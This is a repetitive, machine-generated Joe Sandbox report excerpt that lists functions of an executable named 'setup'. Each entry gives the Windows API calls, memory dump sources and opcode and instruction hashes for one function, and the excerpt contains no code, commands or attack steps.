                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                          • API String ID: 3511171328-631824599
                                                                                                                          • Opcode ID: 6d7ddefcbcfba722492612756d35bbced41bf3640c22e54517dc4ec4bb4f3ef0
                                                                                                                          • Instruction ID: ad8d05b91b86445a0aa96daefd5bdbb44058038897c0752f7850ebc0fde60888
                                                                                                                          • Opcode Fuzzy Hash: 6d7ddefcbcfba722492612756d35bbced41bf3640c22e54517dc4ec4bb4f3ef0
                                                                                                                          • Instruction Fuzzy Hash: 82E092702007118BDB609F34E94975E7BE0BF04744F44892EE455C3690DBB4D889DB91
                                                                                                                          Function 00C209D3 Relevance: 4.6, APIs: 3, Instructions: 93comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00C209EE
                                                                                                                          • CoCreateInstance.OLE32(00C9C2C0,00000000,00000001,00C9C280,?,?,?), ref: 00C20A08
                                                                                                                          • CoUninitialize.OLE32(?,?), ref: 00C20AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 948891078-0
                                                                                                                          • Opcode ID: f5cb987b8f24c46bdbf3438fafe0513e6bb57e652dc21902459b2f3d77544f4f
                                                                                                                          • Instruction ID: 88b46f40b746f384dae953d25f8639c20506117c4fb1e5312ba1f5116c72a381
                                                                                                                          • Opcode Fuzzy Hash: f5cb987b8f24c46bdbf3438fafe0513e6bb57e652dc21902459b2f3d77544f4f
                                                                                                                          • Instruction Fuzzy Hash: C5219171600229AFDB14DB64DC8DE9BBBBCEF44714F204199F509DB291DA70ED81CBA0
                                                                                                                          Function 00C71173 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C7126B
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C71275
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C71282
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: d1360c41a8cab371e6eac0acff0233b6549438616527ecd0d03108f8d584840f
                                                                                                                          • Instruction ID: b0600521edc12f044133461b73ebbff49cf189c25a411adc80115c1c00caead0
                                                                                                                          • Opcode Fuzzy Hash: d1360c41a8cab371e6eac0acff0233b6549438616527ecd0d03108f8d584840f
                                                                                                                          • Instruction Fuzzy Hash: 8931C5749112199BCB61DF68DC897DDBBB8BF18310F5042EAE41CA72A1E7709F858F44
                                                                                                                          Function 00C380C4 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindResourceW.KERNEL32(?,00000000,00000005), ref: 00C380F6
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00C38104
                                                                                                                          • LockResource.KERNEL32(?), ref: 00C38111
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2752051264-0
                                                                                                                          • Opcode ID: 5ce5a575c73e32e90f56e7f18d93dea05bfd061047f4c8d698d93db0d7f5fa2b
                                                                                                                          • Instruction ID: 348c99abe4ef93f5a76cfd196611332311e90052dc609a49dbb60093dd49fb1b
                                                                                                                          • Opcode Fuzzy Hash: 5ce5a575c73e32e90f56e7f18d93dea05bfd061047f4c8d698d93db0d7f5fa2b
                                                                                                                          • Instruction Fuzzy Hash: BD11AC312103109BDB209F20C809BABB7B5FB45B51F098479FC5597290EB71ED0AA760
                                                                                                                          Function 00C31AAF Relevance: 3.4, APIs: 2, Instructions: 404COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 431132790-0
                                                                                                                          • Opcode ID: 134cb45a680f4a0a2f593932e82a09646549267a2c5252bb2cf6ad0ad980d893
                                                                                                                          • Instruction ID: c30781d6fa6ff280fd0921f89e444dd36e08e0e86396053dac071be67ec20427
                                                                                                                          • Opcode Fuzzy Hash: 134cb45a680f4a0a2f593932e82a09646549267a2c5252bb2cf6ad0ad980d893
                                                                                                                          • Instruction Fuzzy Hash: 52E19A70A10219DFDF15DFA4D844BBEBBB5BF48314F188429E816AB291DB31EE41DB90
                                                                                                                          Function 00C2B587 Relevance: 3.3, APIs: 2, Instructions: 274timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C2A9FA: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00C2ABE9,00000002,00000000,00000000,?,?,?,00C2AD15,00000000,00000138,?), ref: 00C2AA2D
                                                                                                                          • _strcat.LIBCMT ref: 00C2B70A
                                                                                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00C2B7EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileTime$DatePointer_strcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2362003032-0
                                                                                                                          • Opcode ID: 17ec5278e914357a40ebdd381d261afdc41ece6fb388353e9258afd2f11dcc3e
                                                                                                                          • Instruction ID: 3d0c5940475ed077557f3dae6a6531b4b090e96923f89aec205da6c1834ca6c5
                                                                                                                          • Opcode Fuzzy Hash: 17ec5278e914357a40ebdd381d261afdc41ece6fb388353e9258afd2f11dcc3e
                                                                                                                          • Instruction Fuzzy Hash: CCB180719046288FCB29DF29D8827D9BBF4BF49300F1445AED1AD97681DB30AE91DF90
                                                                                                                          Function 00C1F238 Relevance: 3.1, APIs: 2, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemInfo.KERNEL32(?,74E2F860,00000000), ref: 00C1F247
                                                                                                                          • VirtualQuery.KERNEL32(00000000,?,0000001C,00000000), ref: 00C1F27C
                                                                                                                            • Part of subcall function 00C1EEE0: GetModuleFileNameW.KERNEL32(?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EF52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoModuleNameQuerySystemVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2607647841-0
                                                                                                                          • Opcode ID: bbbf6bba121529eb9c2c5c85b3a0bdb9b97d3e17c1e1fe165af505566ed8a8a5
                                                                                                                          • Instruction ID: 242eef4009ec9d9e58b6410b0f6b591221e4da41d81fa5156b02741bea8a38ba
                                                                                                                          • Opcode Fuzzy Hash: bbbf6bba121529eb9c2c5c85b3a0bdb9b97d3e17c1e1fe165af505566ed8a8a5
                                                                                                                          • Instruction Fuzzy Hash: 01115175E0011A9BDF10DB95C855BDEBBB9BF89350F14406AE820F7244D774DE82DB90
                                                                                                                          Function 00C789DE Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,00C15E54,00000000,?,00000000), ref: 00C789F3
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C78A12
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1518329722-0
                                                                                                                          • Opcode ID: 52eafa48edcf9aa7f419b7d2bfb0cefaf7c6d864b6288efe49acc3315af2747b
                                                                                                                          • Instruction ID: 528df16256981d32ed68a6a172546e33628c37d0464abdeece4ebce4675bf35a
                                                                                                                          • Opcode Fuzzy Hash: 52eafa48edcf9aa7f419b7d2bfb0cefaf7c6d864b6288efe49acc3315af2747b
                                                                                                                          • Instruction Fuzzy Hash: 15F0F4B1A102147B8B348F6DC808D9EBEE9EBC47B0729C65AE91ED3340E970DE019290
                                                                                                                          Function 00C87910 Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00C87D55,00000000,00000000,00000000), ref: 00C87C14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InformationTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 565725191-0
                                                                                                                          • Opcode ID: 209534fc2d737fe7e368c4156aedeea879d6886d1ed647900040593748a09223
                                                                                                                          • Instruction ID: dcbcd5a47d74130a1308344856cffe824f36c0ac24163bd249773834aaa90750
                                                                                                                          • Opcode Fuzzy Hash: 209534fc2d737fe7e368c4156aedeea879d6886d1ed647900040593748a09223
                                                                                                                          • Instruction Fuzzy Hash: 65C14572904111ABCB14BF65DC42BBE7BB9EF40758F244216F915AB290FB30CE41EB98
                                                                                                                          Function 00C81528 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C81523,?,?,00000008,?,?,00C910E5,00000000), ref: 00C81755
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionRaise
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3997070919-0
                                                                                                                          • Opcode ID: e1219ecc4554e22e2ef12096a46fc9603afb5f7f11999aa0b2dcf27c01361cf3
                                                                                                                          • Instruction ID: 9b4fdb51da15bf9699e9a65e1adafc505a4db55dd53804b1dad8e012f9fd4b8d
                                                                                                                          • Opcode Fuzzy Hash: e1219ecc4554e22e2ef12096a46fc9603afb5f7f11999aa0b2dcf27c01361cf3
                                                                                                                          • Instruction Fuzzy Hash: 36B129316106089FD715DF28C48AB657BE4FF45369F298658ECEACF2A1C335DA82CB44
                                                                                                                          Function 00C47D7F Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C47D95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2325560087-0
                                                                                                                          • Opcode ID: 825ee73f75848f179ea9d8c29c45b352fc63e0e51137605bc165a3fe681b9f5b
                                                                                                                          • Instruction ID: 7529d41c4f56420dabc35a13c1626b29337ba88f1be8cb1d6a93b2b03e3f706a
                                                                                                                          • Opcode Fuzzy Hash: 825ee73f75848f179ea9d8c29c45b352fc63e0e51137605bc165a3fe681b9f5b
                                                                                                                          • Instruction Fuzzy Hash: 77A15BB29106058FDB28CF98DC857AEBBB1FB48324F14866ED415E73A0D3349A59CF50
                                                                                                                          Function 00C76DE2 Relevance: 1.6, Strings: 1, Instructions: 384COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 0-4108050209
                                                                                                                          • Opcode ID: b09913e47784b7e912730f9a760cba0072efd859e2710228de30bf254128296b
                                                                                                                          • Instruction ID: c2667bd8a1f08df8430ccee689b658010e60dbfaf7d556b8c2925a3e2147de8f
                                                                                                                          • Opcode Fuzzy Hash: b09913e47784b7e912730f9a760cba0072efd859e2710228de30bf254128296b
                                                                                                                          • Instruction Fuzzy Hash: DCD1D134A04A0A8FCB24CF69C594A7EBBB1FF49310B24C65DE56E9B790D731AE41CB50
                                                                                                                          Function 00C8805D Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8296ee0c89d059c093f1d45e54ca1104706ee4895c7e1420481e526f8f5f8fea
                                                                                                                          • Instruction ID: 97b50b5aed54361323565c25a841c669d57a86728dcd88552fd3b6e67c18c289
                                                                                                                          • Opcode Fuzzy Hash: 8296ee0c89d059c093f1d45e54ca1104706ee4895c7e1420481e526f8f5f8fea
                                                                                                                          • Instruction Fuzzy Hash: CE31E47290021DAFCB20EFB8CC88DBFB76DEB84318F548159F81597244EE30AE449B64
                                                                                                                          Function 00C76A83 Relevance: 1.6, Strings: 1, Instructions: 333COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 0-4108050209
                                                                                                                          • Opcode ID: 05d0ba20089bead21e6eaed2a20062f9d695d4eaff3520e8122fe539843d1d1b
                                                                                                                          • Instruction ID: b0611a8dd50f667933d4fa27ca5aab17548095690efdd085bcda444e9c0b9100
                                                                                                                          • Opcode Fuzzy Hash: 05d0ba20089bead21e6eaed2a20062f9d695d4eaff3520e8122fe539843d1d1b
                                                                                                                          • Instruction Fuzzy Hash: 49C1DF70A00E0A8FCB35CF68C5856BABBB1FF16310F14C619D4AAD7691C731AE45EB51
                                                                                                                          Function 00C76741 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 0-4108050209
                                                                                                                          • Opcode ID: b668ae7155efc81e270b9f89252020a24907cb6f0213a117585e2defc6248d7e
                                                                                                                          • Instruction ID: a2fbc4ca85759b27a651b025fb47728fa361f6adfb41d81c7569dc316de2fa4c
                                                                                                                          • Opcode Fuzzy Hash: b668ae7155efc81e270b9f89252020a24907cb6f0213a117585e2defc6248d7e
                                                                                                                          • Instruction Fuzzy Hash: FFB1E130904E0A8BCB28CE69C9556BEBBB1AF00314F14C61DD5AEA7691DB30AF41DB52
                                                                                                                          Function 00C27B54 Relevance: 1.6, APIs: 1, Instructions: 300COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000000E,00000000,00000000,00000000,?,?,00C26722,?,00CC0B54,?,00000000,00000000,00000000), ref: 00C27CFE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
